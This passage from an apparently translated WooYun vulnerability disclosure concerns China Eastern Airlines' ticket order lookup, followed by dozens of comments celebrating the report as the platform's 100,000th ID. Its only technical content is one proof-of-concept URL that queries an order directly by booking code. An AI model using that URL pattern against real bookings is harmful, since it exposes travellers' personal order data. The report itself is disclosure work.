[Screenshot: 屏幕快照 2015-03-07 下午1.02.55.png]

http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NE15R7
[Screenshot: 屏幕快照 2015-03-07 下午1.03.49.png]

Fix recommendation:

Copyright notice: when reposting, credit the source 北京方便面@乌云


Vulnerability response

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2015-03-07 22:02

Vendor reply:

Many thanks.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-03-07 13:53 | 浩天 Certified white hat ( Regular white hat | Rank: 915 | Vulns: 79 | On vacation...)

    The 100K ID is a milestone

  2. 2015-03-07 13:57 | 毕月乌 ( Regular white hat | Rank: 120 | Vulns: 16 | Guess who I am?)

    100K, leaving my mark!

  3. 2015-03-07 13:58 | sdc1992 ( Intern white hat | Rank: 32 | Vulns: 12 )

    100K, leaving my mark!

  4. 2015-03-07 13:58 | 子非海绵宝宝 Certified white hat ( Core white hat | Rank: 1044 | Vulns: 106 | Carry on the SpongeBob spirit! You're not SpongeBob, how...)

    100K, leaving my mark!

  5. 2015-03-07 13:58 | Finger Certified white hat ( Regular white hat | Rank: 777 | Vulns: 95 | Someone has recently been impersonating this account to scam people; anyone claiming to be Finger and...)

    100K, leaving my mark!

  6. 2015-03-07 13:58 | Noxxx ( Regular white hat | Rank: 509 | Vulns: 41 )

    100K, leaving my mark!

  7. 2015-03-07 13:59 | 疯狗 Certified white hat ( Intern white hat | Rank: 44 | Vulns: 2 | Having read every vulnerability under heaven, there's naturally no code left in my heart.)

    Isn't this the moment for "Congratulations, the submitter has won the 100K cash prize, please call 010-88888888 to claim your reward"?

  8. 2015-03-07 14:28 | 红客十年 ( Regular white hat | Rank: 334 | Vulns: 63 | Quit Foxconn last year, went home and enrolled at Lanxiang, graduated from Lanxiang...)

    Sitting here waiting for the thunder

  9. 2015-03-07 14:47 | 泳少 ( Regular white hat | Rank: 231 | Vulns: 79 | ★ Once you set foot on the road of dreams, even on your knees you must...)

    100K, leaving my mark

  10. 2015-03-07 15:23 | 蓝哆 ( Intern white hat | Rank: 84 | Vulns: 12 | Doing all I can to change the Internet's tomorrow~ I'm the reckless Duo)

    Leaving my mark!!!!!!!!

  11. 2015-03-07 16:18 | 李旭敏 ( Regular white hat | Rank: 469 | Vulns: 71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    Rumor has it the 100,000th gets banned

  12. 2015-03-07 16:25 | Woodee ( Passer-by | no vulnerabilities published yet | WooYun passer-by, face-slapping pa pa pa)

    100K, leaving my mark!

  13. 2015-03-07 16:53 | 北京方便面 Certified white hat ( Core white hat | Rank: 876 | Vulns: 66 | I love eating Beijing instant noodles)

    @疯狗 @Finger Already called, where's the reward?

  14. 2015-03-07 17:10 | 哆嗦春梦 ( Passer-by | Rank: 4 | Vulns: 2 | Someone who likes having spring dreams)

    Holy crap, that's awesome... I can't handle it...

  15. 2015-03-07 17:18 | 贫道来自河北 ( Regular white hat | Rank: 1395 | Vulns: 423 | A man determined to turn the WooYun market into a snack shop)

    Damn, thunder again

  16. 2015-03-07 17:35 | s3xy ( Core white hat | Rank: 832 | Vulns: 113 | Rather than cling together in hardship, better to forget each other in the wide world)

    666

  17. 2015-03-07 18:05 | 爱上平顶山 Certified white hat ( Core white hat | Rank: 2738 | Vulns: 547 | [no hat] A stranger in a strange land. Formerly employed at a certain institution in the Celestial Empire. IT...)

    10.

  18. 2015-03-07 18:25 | bey0nd ( Regular white hat | Rank: 895 | Vulns: 142 | Rather than forget each other in the wide world, better to cling together in hardship)

    100000

  19. 2015-03-07 18:28 | 蜉蝣 ( Intern white hat | Rank: 93 | Vulns: 24 )

    100000

  20. 2015-03-07 18:35 | Hxai11 ( Regular white hat | Rank: 1137 | Vulns: 218 | So we beat on, boats against the current, borne back ceaselessly...)

    100K, leaving my mark

  21. 2015-03-07 18:36 | 天朝城管 ( Regular white hat | Rank: 116 | Vulns: 35 | Don't wait until life plays you to start playing with your life)

    100K, leaving my mark!

  22. 2015-03-07 18:44 | scanf ( Core white hat | Rank: 1232 | Vulns: 186 | .)

    100K, leaving my mark!

  23. 2015-03-07 19:02 | huc-ray ( Passer-by | Rank: 25 | Vulns: 7 | Just a newbie)

    100K, leaving my mark

  24. 2015-03-07 19:30 | 机器猫 ( Regular white hat | Rank: 1141 | Vulns: 253 | Love life, love Tencent, love the Internet!)

    100K, leaving my mark!

  25. 2015-03-07 19:35 | 从容 ( Regular white hat | Rank: 221 | Vulns: 75 | Enjoy Hacking Just Because It's Fun :) ...)

    100K....

  26. 2015-03-07 21:52 | 小胖子 Certified white hat ( Core white hat | Rank: 1727 | Vulns: 140 | If the sea could carry away my short ugly...)

    100K, leaving my mark!

  27. 2015-03-07 22:09 | f4ckbaidu ( Regular white hat | Rank: 182 | Vulns: 23 | Development is a dog's life)

    100K milestone, mark

  28. 2015-03-07 22:34 | 孤独雪狼 ( Regular white hat | Rank: 710 | Vulns: 145 | Phone stolen on Qixi, what a crappy Qixi....)

    100K, leaving my mark!

  29. 2015-03-08 02:46 | 老阎 ( Passer-by | Rank: 5 | Vulns: 2 | Looking for a master to take me on)

    100K, leaving my mark

  30. 2015-04-21 14:51 | BeenQuiver ( Regular white hat | Rank: 101 | Vulns: 26 | Focused and efficient; never give up good habits)

    Drop-dead awesome

  31. 2015-04-21 15:46 | bey0nd ( Regular white hat | Rank: 895 | Vulns: 142 | Rather than forget each other in the wide world, better to cling together in hardship)

    Didn't see the ID numbers or such..

  32. 2015-04-21 15:54 | 大物期末不能挂 ( Regular white hat | Rank: 132 | Vulns: 23 | 1. A slacker who just wants to pass every course 2. Want to submit vulns...)

    100K, leaving my mark

  33. 2015-04-21 16:28 | 开心一下1313 ( Intern white hat | Rank: 63 | Vulns: 20 | Sip some water, calm down......)

    Can't get any more badass!

  34. 2015-06-02 11:18 | ( Passer-by | Rank: 0 | Vulns: 1 | A lone wolf chasing the wind)

    100K! Leaving my mark~